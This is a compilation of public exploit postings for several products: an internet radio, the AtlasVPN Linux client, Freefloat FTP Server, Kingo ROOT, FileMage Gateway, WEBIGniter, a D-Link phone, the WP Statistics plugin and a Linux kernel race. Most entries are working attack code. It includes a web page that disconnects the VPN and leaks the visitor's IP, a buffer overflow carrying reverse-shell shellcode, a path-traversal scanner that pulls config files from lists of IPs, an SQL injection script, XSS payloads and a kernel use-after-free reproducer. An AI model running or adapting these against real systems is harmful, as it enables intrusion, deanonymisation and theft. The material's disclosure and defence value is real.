<pre><code>The internet radio device auna IR-160 SE has multiple vulnerabilities. <br />It uses the firmware UIProto, different versions of which can also be <br />found in many other radios.<br /><br />1. The firmware offers a rudimentary web API that can be reached on the <br />local network on port 80. This API is completely unauthenticated, <br />allowing anyone to control the radio over the local network. (already <br />known as CVE-2019-13474, but relevant for the other two findings) [1] <br />[2] [3]<br /><br />2. The web UI does not encode user input, resulting in a XSS <br />vulnerability, e.g. when changing the device name as follows:<br />http://192.168.178.93/set_dname?name=><script>alert(1)</script><br /><br />3. The firmware crashes when sending a device name longer than 84 <br />characters. Some parts of the firmware will recover afterwards and music <br />will play again after a few seconds, but the service on port 80 remains <br />borked until the radio is reset using the switch on the back. This may <br />or may not be a memory corruption vulnerability. I don't feel like <br />analyzing this any further, but it certainly looks kinda fucked.<br />.../set_dname?name=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa<br /><br />For other vulnerabilities in UIProto see CVE-2019-13473 and <br />CVE-2019-13474 discovered by Benjamin K.M. These reports also mention <br />other devices that are possibly affected by this as well.<br /><br />Also, if anyone knows how to re-enable telnetd on the patched version of <br />UIProto, please let me know!<br /><br />Love,<br />naphthalin<br /><br />[1] https://github.com/kayrus/iradio<br />[2] https://sites.google.com/site/tweakradje/devices/abeo-internet-radio<br />[3] <br />https://www.vulnerability-db.com/?q=articles/2019/09/09/imperial-dabman-internet-radio-undocumented-telnetd-code-execution<br /><br /></code></pre>
<pre><code>The following is my 0day. This code, when executed on any website, disconnects the AtlasVPN linux client and leaks the users IP address. I am not yet aware of it being used in the wild. However, it shows that AtlasVPN does not take their users safety serious, because their software security decisions suck so massively that its hard to believe this is a bug rather than a backdoor. Nobody can be this incompetent. I tried to contact their support to get hold of a security contact, a pgp key or any signs of a bug bounty programme. Nope. No answer.<br /><br />Root Cause<br /><br />The AtlasVPN Linux Client consists of two parts. A daemon (atlasvpnd) that manages the connections and a client (atlasvpn) that the user controls to connect, disconnect and list services. The client does not connect via a local socket or any other secure means but instead it opens an API on localhost on port 8076. It does not have ANY authentication. This port can be accessed by ANY program running on the computer, including the browser. A malicious javascript on ANY website can therefore craft a request to that port and disconnect the VPN. If it then runs another request, this leaks the users home IP address to ANY website using the exploit code.<br /><br />Exploit Code<br /><br />The following code demonstrates the issue. It can be uploaded to any webserver. When the site is visited, AtlasVPN disconnects and leaks the IP address. Not intended for illegal purposes.<br /><br /><br /><br /> <html><br /> <head><br /> <title>=[ atlasvpnd 1.0.3 remote disconnect exploit ]=</title><br /> </head><br /> <body><br /> <pre><code id="log">=[ atlasvpnd 1.0.3 remote disconnect exploit ]=<br /> You should be running the atlasvpn linux client and be connected to a VPN.<br /> Use <b>atlasvpn connect</b> to connect to a VPN server.<br /> </code></pre><br /> <iframe id="hiddenFrame" name="hiddenFrame" style="display: none;"></iframe><br /> <form id="stopForm" action="http://127.0.0.1:8076/connection/stop" method="post" target="hiddenFrame"><br /> <button type="submit" style="display: none"></button><br /> </form><br /> <script><br /> window._currentIP = false;<br /> // Run main exploit code<br /> window.addEventListener('load', function () {<br /> addIPToLog();<br /> setTimeout(triggerFormSubmission, 1000);<br /> setTimeout(addIPToLog, 3000);<br /> });<br /> // Blind CORS request to atlasvpnd to disconnect the VPN<br /> function triggerFormSubmission() {<br /> var logDiv = document.getElementById('log');<br /> logDiv.innerHTML += "[-] Sending disconnect request to atlasvpnd...\n";<br /> document.getElementById('stopForm').submit();<br /> }<br /> // Gets IP from ipfy API (this, of course, could be your server)<br /> function addIPToLog() {<br /> var logDiv = document.getElementById('log');<br /> var xhr = new XMLHttpRequest();<br /> xhr.open('GET', 'https://api.ipify.org?format=json', true);<br /> xhr.onload = function () {<br /> var ipAddress = window._currentIP;<br /> if (xhr.status === 200) {<br /> var response = JSON.parse(xhr.responseText);<br /> ipAddress = response.ip;<br /> logDiv.innerHTML += '[?] Current IP:' + ipAddress + "\n";<br /> } else {<br /> logDiv.innerHTML += '[-] Error fetching IP address.\n';<br /> }<br /> // Check if the IP changed. If yes: Success.<br /> if (window._currentIP && window._currentIP != ipAddress) {<br /> logDiv.innerHTML += "[+] Successfully disconnected VPN."<br /> }<br /> if (window._currentIP && window._currentIP == ipAddress) {<br /> logDiv.innerHTML += "[-] Disconnect failed our you were not connected to the VPN in the first place."<br /> }<br /> // Save IP for next iteration.<br /> window._currentIP = ipAddress;<br /> };<br /> xhr.send();<br /> }<br /> </script><br /> </body><br /> </html><br /> <br /><br /><br />Greets<br /><br />Fly out to a certain crafter of trashy maps and my favourite WoW NPC. I hope this makes it into the press. Peace out.<br /></code></pre>
<pre><code>#Exploit title: Freefloat FTP Server 1.0 - 'PWD' Remote Buffer Overflow<br />#Date: 08/22/2023<br />#Exploit Author: Waqas Ahmed Faroouqi (ZEROXINN)<br />#Vendor Homepage: http://www.freefoat.com<br />#Version: 1.0<br />#Tested on Windows XP SP3 <br /><br /><br />#!/usr/bin/python<br /><br />import socket<br /><br />#Metasploit Shellcode<br />#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.146.134 LPORT=4444 -b '\x00\x0d' <br /><br />#nc -lvp 4444<br />#Send exploit<br /><br /><br />#offset = 247 <br />#badchars=\x00\x0d\<br />#return_address=\x3b\x69\x5a\x77 (ole32.dll)<br /><br />payload = (<br />"\xb8\xf3\x93\x2e\x96\xdb\xca\xd9\x74\x24\xf4\x5b\x31\xc9"<br />"\xb1\x52\x31\x43\x12\x83\xeb\xfc\x03\xb0\x9d\xcc\x63\xca"<br />"\x4a\x92\x8c\x32\x8b\xf3\x05\xd7\xba\x33\x71\x9c\xed\x83"<br />"\xf1\xf0\x01\x6f\x57\xe0\x92\x1d\x70\x07\x12\xab\xa6\x26"<br />"\xa3\x80\x9b\x29\x27\xdb\xcf\x89\x16\x14\x02\xc8\x5f\x49"<br />"\xef\x98\x08\x05\x42\x0c\x3c\x53\x5f\xa7\x0e\x75\xe7\x54"<br />"\xc6\x74\xc6\xcb\x5c\x2f\xc8\xea\xb1\x5b\x41\xf4\xd6\x66"<br />"\x1b\x8f\x2d\x1c\x9a\x59\x7c\xdd\x31\xa4\xb0\x2c\x4b\xe1"<br />"\x77\xcf\x3e\x1b\x84\x72\x39\xd8\xf6\xa8\xcc\xfa\x51\x3a"<br />"\x76\x26\x63\xef\xe1\xad\x6f\x44\x65\xe9\x73\x5b\xaa\x82"<br />"\x88\xd0\x4d\x44\x19\xa2\x69\x40\x41\x70\x13\xd1\x2f\xd7"<br />"\x2c\x01\x90\x88\x88\x4a\x3d\xdc\xa0\x11\x2a\x11\x89\xa9"<br />"\xaa\x3d\x9a\xda\x98\xe2\x30\x74\x91\x6b\x9f\x83\xd6\x41"<br />"\x67\x1b\x29\x6a\x98\x32\xee\x3e\xc8\x2c\xc7\x3e\x83\xac"<br />"\xe8\xea\x04\xfc\x46\x45\xe5\xac\x26\x35\x8d\xa6\xa8\x6a"<br />"\xad\xc9\x62\x03\x44\x30\xe5\xec\x31\xa8\x73\x84\x43\xcc"<br />"\x6a\x09\xcd\x2a\xe6\xa1\x9b\xe5\x9f\x58\x86\x7d\x01\xa4"<br />"\x1c\xf8\x01\x2e\x93\xfd\xcc\xc7\xde\xed\xb9\x27\x95\x4f"<br />"\x6f\x37\x03\xe7\xf3\xaa\xc8\xf7\x7a\xd7\x46\xa0\x2b\x29"<br />"\x9f\x24\xc6\x10\x09\x5a\x1b\xc4\x72\xde\xc0\x35\x7c\xdf"<br />"\x85\x02\x5a\xcf\x53\x8a\xe6\xbb\x0b\xdd\xb0\x15\xea\xb7"<br />"\x72\xcf\xa4\x64\xdd\x87\x31\x47\xde\xd1\x3d\x82\xa8\x3d"<br />"\x8f\x7b\xed\x42\x20\xec\xf9\x3b\x5c\x8c\x06\x96\xe4\xac"<br />"\xe4\x32\x11\x45\xb1\xd7\x98\x08\x42\x02\xde\x34\xc1\xa6"<br />"\x9f\xc2\xd9\xc3\x9a\x8f\x5d\x38\xd7\x80\x0b\x3e\x44\xa0"<br />"\x19")<br /><br />shellcode = 'A' * 247 + "\x3b\x69\x5a\x77" + '\x90' * 10 + payload<br /><br />def main():<br /> ip = '192.168.146.135'<br /> port = 21<br /><br /> sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br /> sock.connect((ip, port))<br /> <br /> sock.recv(1024)<br /> sock.send('USER anonymous\r\n')<br /> sock.recv(1024)<br /> sock.send('PASS anonymous\r\n')<br /> sock.recv(1024)<br /> sock.send('pwd ' + shellcode + '\r\n')<br /> sock.close()<br /> <br />if __name__ == '__main__':<br /> main()<br /><br /></code></pre>
<pre><code>#Exploit Title: Kingo ROOT 1.5.8 - Unquoted Service Path<br />#Date: 8/22/2023<br />#Exploit Author: Anish Feroz (ZEROXINN)<br />#Vendor Homepage: https://www.kingoapp.com/<br />#Software Link: https://www.kingoapp.com/android-root/download.htm<br />#Version: 1.5.8.3353<br />#Tested on: Windows 10 Pro<br /><br />-------------Discovering Unquoted Path--------------<br /><br />C:\Users\Anish>sc qc KingoSoftService<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: KingoSoftService<br /> TYPE : 110 WIN32_OWN_PROCESS (interactive)<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : C:\Users\Usman\AppData\Local\Kingosoft\Kingo Root\update_27205\bin\KingoSoftService.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : KingoSoftService<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br />C:\Users\Anish>systeminfo<br /><br />Host Name: DESKTOP-UT7E7CF<br />OS Name: Microsoft Windows 10 Pro<br />OS Version: 10.0.19045 N/A Build 19045<br /><br /></code></pre>
<pre><code># Exploit Title: FileMage Gateway 1.10.9 - Local File Inclusion<br /># Date: 8/22/2023<br /># Exploit Author: Bryce "Raindayzz" Harty <br /># Vendor Homepage: https://www.filemage.io/<br /># Version: Azure Versions < 1.10.9<br /># Tested on: All Azure deployments < 1.10.9 <br /># CVE : CVE-2023-39026<br /><br /># Technical Blog - https://raindayzz.com/technicalblog/2023/08/20/FileMage-Vulnerability.html<br /># Patch from vendor - https://www.filemage.io/docs/updates.html<br /><br />import requests<br />import warnings<br />warnings.filterwarnings("ignore")<br />def worker(url):<br /> response = requests.get(url, verify=False, timeout=.5)<br /> return response<br />def main():<br /> listIP = []<br /> file_path = input("Enter the path to the file containing the IP addresses: ")<br /> with open(file_path, 'r') as file:<br /> ip_list = file.read().splitlines()<br /> searchString = "tls"<br /> for ip in ip_list:<br /> url = f"https://{ip}" + "/mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cprogramdata%5cfilemage%5cgateway%5cconfig.yaml"<br /> try:<br /> response = worker(url)<br /> #print(response.text)<br /> if searchString in response.text:<br /> print("Vulnerable IP: " + ip)<br /> print(response.text)<br /> listIP.append(ip)<br /> except requests.exceptions.RequestException as e: <br /> print(f"Error occurred for {ip}: {str(e)}")<br /><br /> for x in listIP:<br /> print(x)<br />if __name__ == '__main__':<br /> main()<br /> <br /><br /></code></pre>
<pre><code>## Title: WEBIGniter-28.7.23 File Upload - RCE<br />## Author: nu11secur1ty<br />## Date: 09/04/2023<br />## Vendor: https://webigniter.net/<br />## Software: https://webigniter.net/demo<br />## Reference: https://portswigger.net/web-security/file-upload<br /><br /><br />## Description:<br />The media function suffers from file upload vulnerability.<br />The attacker can upload and he can execute remotely very dangerous PHP<br />files, by using any created account before this on this system.<br />Then he can do very malicious stuff with the server of this application.<br /><br />## Staus: HIGH-CRITICAL Vulnerability<br /><br />[+]Simple Exploit:<br />```PHP<br /><?php<br /> phpinfo();<br />?><br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WEBIGniter/2023/WEBIGniter-28.7.23-File-Upload-RCE)<br /><br />## Proof and Exploit<br />[href](https://www.nu11secur1ty.com/2023/09/webigniter-28723-file-upload-rce.html)<br /><br />## Time spent:<br />00:15:00<br /><br /><br /></code></pre>
<pre><code>## Title: WEBIGniter-28.7.23-XSS-Reflected<br />## Author: nu11secur1ty<br />## Date: 09/04/2023<br />## Vendor: https://webigniter.net/<br />## Software: https://webigniter.net/demo<br />## Reference: https://portswigger.net/web-security/cross-site-scripting<br /><br /><br />## Description:<br />The value of the redirect request parameter is copied into the value<br />of an HTML tag attribute which is encapsulated in double quotation<br />marks. The payload ycsz3"><script>alert(1)</script>bn76w was submitted<br />in the redirect parameter. This input was echoed unmodified in the<br />application's response.<br />By using this Java Script injection, the attacker can trick a lot of<br />users into visiting his dangerous URL which is reflected on the login<br />form, before they log in, warning them that there is a problem with<br />the login, which is very nasty and DANGEROUS!<br /><br />## Staus: HIGH Vulnerability<br /><br />[+]Paylod:<br />```GET<br />GET /cms/login?redirect=cmsycsz3%22%3e%3cscript%3ealert(1)%3c%2fscript%3ebn76w<br />HTTP/1.1<br />Host: demo.webigniter.net<br />Accept-Encoding: gzip, deflate<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Accept-Language: en-US;q=0.9,en;q=0.8<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)<br />AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141<br />Safari/537.36<br />Connection: close<br />Cache-Control: max-age=0<br />Upgrade-Insecure-Requests: 1<br />Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"<br />Sec-CH-UA-Platform: Windows<br />Sec-CH-UA-Mobile: ?0<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WEBIGniter/2023/WEBIGniter-28.7.23-XSS-Reflected)<br /><br />## Proof and Exploit<br />[href](https://www.nu11secur1ty.com/2023/09/webigniter-28723-xss-reflected.html)<br /><br />## Time spent:<br />01:35:00<br /><br /><br /></code></pre>
<pre><code># Exploit Title : DLINK DPH-400SE - Exposure of Sensitive Information<br /># Date : 25-08-2023<br /># Exploit Author : tahaafarooq<br /># Vendor Homepage : https://dlink.com/<br /># Version : FRU2.2.15.8<br /># Tested on: DLINK DPH-400SE (VoIP Phone)<br /><br />Description:<br /><br />With default credential for the guest user "guest:guest" to login on the web portal, the guest user can head to maintenance tab under access and modify the users which allows guest user to modify all users as well as view passwords for all users. For a thorough POC writeup visit: https://hackmd.io/@tahaafarooq/dlink-dph-400se-cwe-200<br /><br />POC :<br /><br />1. Login with the default guest credentials "guest:guest"<br />2. Access the Maintenance tab.<br />3. Under the maintenance tab, access the "Access" feature<br />4. On "Account Option" choose a user to modify, thus "Admin" and click modify.<br />5. Right click on the password, and click reveal, the password is then seen in plaintext.<br /><br /></code></pre>
<pre><code># Exploit Title: WP Statistics Plugin <= 13.1.5 current_page_id - Time based SQL injection (Unauthenticated)<br /># Date: 13/02/2022<br /># Exploit Author: psychoSherlock<br /># Vendor Homepage: https://wp-statistics.com/<br /># Software Link: https://downloads.wordpress.org/plugin/wp-statistics.13.1.5.zip<br /># Version: 13.1.5 and prior<br /># Tested on: wp-statistics 13.1.5<br /># CVE : CVE-2022-25148<br /># Vendor URL: https://wordpress.org/plugins/wp-statistics/<br /># CVSS Score: 8.4 (High)<br /><br />import argparse<br />import requests<br />import re<br />import urllib.parse<br /><br /><br />def main():<br /> parser = argparse.ArgumentParser(description="CVE-2022-25148")<br /> parser.add_argument('-u', '--url', required=True,<br /> help='Wordpress base URL')<br /><br /> args = parser.parse_args()<br /><br /> baseUrl = args.url<br /> payload = "IF(1=1, sleep(5), 1)"<br /><br /> wp_session = requests.session()<br /><br /> resp = wp_session.get(baseUrl)<br /> nonce = re.search(r'_wpnonce=(.*?)&wp_statistics_hit', resp.text).group(1)<br /> print(f"Gathered Nonce: {nonce}")<br /><br /> headers = {<br /> "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15"}<br /><br /> payload = urllib.parse.quote_plus(payload)<br /> exploit = f'/wp-json/wp-statistics/v2/hit?_=11&_wpnonce={nonce}&wp_statistics_hit_rest=&browser=&platform=&version=&referred=&ip=11.11.11.11&exclusion_match=no&exclusion_reason&ua=Something&track_all=1&timestamp=11&current_page_type=home&current_page_id={payload}&search_query&page_uri=/&user_id=0'<br /> exploit_url = baseUrl + exploit<br /><br /> print(f'\nSending: {exploit_url}')<br /><br /> resp = wp_session.get(exploit_url, headers=headers)<br /><br /> if float(resp.elapsed.total_seconds()) >= 5.0:<br /> print("\n!!! Target is vulnerable !!!")<br /> print(f'\nTime taken: {resp.elapsed.total_seconds()}')<br /> else:<br /> print('Target is not vulnerable')<br /><br /><br />if __name__ == "__main__":<br /> main()<br /> <br /><br /></code></pre>
<pre><code>Linux 6.4: UAF race between mbind() and VMA-locked page fault<br /><br />(tested on git master, at commit 57012c57536f)<br /><br />Summary:<br /><br />There's a race between mbind() and VMA-locked page faults, leading to UAF.<br />You can quickly hit this with a straightforward reproducer that just keeps calling mbind() on one thread and causing page faults on another thread.<br />I'll send a suggested patch in a minute.<br /><br />mbind() replaces vma->vm_policy while only protected by mmap_write_lock(), which can involve freeing the old vma->vm_policy:<br /><br />sys_mbind<br /> kernel_mbind<br /> do_mbind<br /> mmap_write_lock<br /> mbind_range [for each vma in range]<br /> vma_replace_policy<br /> new = mpol_dup(...)<br /> old = vma->vm_policy<br /> vma->vm_policy = new<br /> mpol_put(old)<br /> mmap_write_unlock<br /><br /><br />VMA-locked page fault handling can allocate pages, which requires using the vma->vm_policy:<br /><br />do_user_addr_fault<br /> lock_vma_under_rcu<br /> handle_mm_fault<br /> __handle_mm_fault<br /> handle_pte_fault<br /> do_pte_missing<br /> do_anonymous_page<br /> vma_alloc_zeroed_movable_folio<br /> vma_alloc_folio<br /> get_vma_policy<br /> __get_vma_policy<br /> pol = vma->vm_policy ***race***<br /> mpol_get(pol) [conditional on MPOL_F_SHARED]<br /> [do page allocation]<br /> mpol_cond_put(pol)<br /> vma_end_read<br /><br />Because of the mpol_cond_put(pol) call, it should be possible for this to manifest as a UAF write.<br /><br /><br />You can hit this race on a kernel with CONFIG_NUMA and CONFIG_KASAN very quickly (less than a second, I think) with this reproducer - you don't need an actual NUMA system for this, I've tested it in a QEMU VM without NUMA:<br /><br />==============<br />// gcc -pthread -o mbind-vs-pf mbind-vs-pf.c -Wall<br />#define _GNU_SOURCE<br />#include <pthread.h><br />#include <err.h><br />#include <unistd.h><br />#include <sys/syscall.h><br />#include <sys/mman.h><br />#include <linux/mempolicy.h><br /><br />#define SYSCHK(x) ({ \\<br /> typeof(x) __res = (x); \\<br /> if (__res == (typeof(x))-1L) \\<br /> err(1, \"SYSCHK(\" #x \")\"); \\<br /> __res; \\<br />})<br /><br />static char *vma;<br /><br />static void *fault_thread(void *arg) {<br /> while (1) {<br /> // fault in...<br /> *vma = 1;<br /> // ... and zero the PTE again with zap_page_range_single()<br /> SYSCHK(madvise(vma, 0x1000, MADV_DONTNEED));<br /> }<br />}<br /><br />static void mbind_vma(unsigned long policy) {<br /> unsigned long nmask = (1UL << 0);<br /> SYSCHK(syscall(__NR_mbind, vma, 0x1000, policy|0, &nmask, sizeof(nmask)*8+1, 0));<br />}<br /><br />int main(void) {<br /> vma = SYSCHK(mmap((void*)0x100000, 0x1000,<br /> PROT_READ|PROT_WRITE|PROT_EXEC,<br /> MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED_NOREPLACE, -1, 0));<br /> pthread_t thread;<br /> if (pthread_create(&thread, NULL, fault_thread, NULL))<br /> errx(1, \"pthread_create\");<br /><br /> while (1) {<br /> mbind_vma(MPOL_BIND);<br /> mbind_vma(MPOL_INTERLEAVE);<br /> }<br />}<br />==============<br /><br />This will give the following splat:<br /><br />==================================================================<br />BUG: KASAN: slab-use-after-free in vma_alloc_folio+0x93/0x220<br />Read of size 2 at addr ffff888007c0e6f6 by task mbind-vs-pf/556<br /><br />CPU: 3 PID: 556 Comm: mbind-vs-pf Not tainted 6.5.0-rc3-00123-g57012c57536f #304<br />Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014<br />Call Trace:<br /> <TASK><br /> dump_stack_lvl+0x36/0x50<br /> print_report+0xcf/0x660<br />[...]<br /> kasan_report+0xc7/0x100<br />[...]<br /> vma_alloc_folio+0x93/0x220<br /> __handle_mm_fault+0x71b/0x1060<br />[...]<br /> handle_mm_fault+0xbe/0x280<br /> do_user_addr_fault+0x196/0x630<br /> exc_page_fault+0x5c/0xc0<br /> asm_exc_page_fault+0x26/0x30<br />[...]<br /> </TASK><br /><br />Allocated by task 555:<br /> kasan_save_stack+0x33/0x60<br /> kasan_set_track+0x25/0x30<br /> __kasan_slab_alloc+0x6e/0x70<br /> kmem_cache_alloc+0xf5/0x260<br /> __mpol_dup+0x72/0x1c0<br /> vma_replace_policy+0x20/0xb0<br /> do_mbind+0x379/0x510<br /> kernel_mbind+0x11a/0x130<br /> do_syscall_64+0x3b/0x90<br /> entry_SYSCALL_64_after_hwframe+0x6e/0xd8<br /><br />Freed by task 555:<br /> kasan_save_stack+0x33/0x60<br /> kasan_set_track+0x25/0x30<br /> kasan_save_free_info+0x2b/0x50<br /> __kasan_slab_free+0x10a/0x180<br /> kmem_cache_free+0xaa/0x380<br /> vma_replace_policy+0x87/0xb0<br /> do_mbind+0x379/0x510<br /> kernel_mbind+0x11a/0x130<br /> do_syscall_64+0x3b/0x90<br /> entry_SYSCALL_64_after_hwframe+0x6e/0xd8<br />[...]<br />==================================================================<br /><br />If I leave the reproducer running some more, I get other crashes, like in the KASAN internals, that suggest that the reproducer is already causing memory corruption.<br /><br />In case you're curious: I found this by grepping for mmap_write_lock*() calls and looking at most of them to figure out if they do anything interesting to VMAs without taking VMA locks.<br /><br /><br />This bug is subject to a 90-day disclosure deadline. If a fix for this<br />issue is made available to users before the end of the 90-day deadline,<br />this bug report will become public 30 days after the fix was made<br />available. Otherwise, this bug report will become public at the deadline.<br />The scheduled deadline is 2023-10-26.<br /><br /><br /><br /><br />Found by: jannh@google.com<br /><br /></code></pre>